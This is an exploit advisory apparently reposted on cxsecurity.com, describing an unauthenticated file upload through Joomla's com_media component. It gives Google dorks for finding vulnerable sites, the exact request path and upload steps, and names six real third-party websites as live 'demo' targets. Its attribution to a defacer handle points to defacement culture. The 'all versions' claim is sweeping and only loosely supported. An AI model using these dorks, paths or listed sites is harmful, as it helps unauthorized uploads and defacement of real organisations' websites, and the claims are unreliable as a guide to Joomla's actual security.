Joomla com_media Upload Vulnerability

Published
Credit
Risk
2017.02.18
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/component/media/ and inurl:/index.php/component/media/

#######################################################
##################{In The Name Of God}#################
#######################################################

############################################
# Exploit Title: Joomla Media Upload Vulnerability
# Date: 2017 | 18 | February
# Author: Ashiyane Digital Security Team
# Vendor Homepage : https://www.joomla.org
# Version: All Version
# Tested On : Windows 8 / Chrome
############################################

########
# Google Dork 1 : inurl:/component/media/
# Google Dork 2 : inurl:/index.php/component/media/
########

########
# exploit => /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# then => http://www.site.com/[path]/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# select => Select the "Upload file"> Choose Files And : Uploaded File URL: site.com/images/[filename]
#
# ( We Can Upload Files With This Formats : txt - jpg - png - gif)
#
# after file upload you able to see file in the path => http://site.com/[path]
#
########

########
# Demo 1 : http://www.personcentredplanning.eu/index.php/component/media/?view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
#
# Demo 2 : http://www.restaurantportocolom.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 3 : http://europeanaffairs.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 4 : http://www.reach.org.sg/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 5 : http://www.mansfield.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 6 : http://www.stepstograce.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
########

[+][+][+][+][+][+][+][+][+][+][+][+]

Discovered By : Cyber.Defacer

[+][+][+][+][+][+][+][+][+][+][+][+]
*=============================================================|
| Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ،
| Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ، micle
| r4ouf ، Net Hacker ، Spoofer ، alcol ، 1TED ، H4554N، shahroukh، Saeid_9n ،
| F.SQLi ، Muts ، HackFans، B14CK SPID3R ، MALWaRE43 ، moh3nra021 , Sha4yan , M.R.S.L.Y
| And All Of My Friends ...
*=============================================================|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com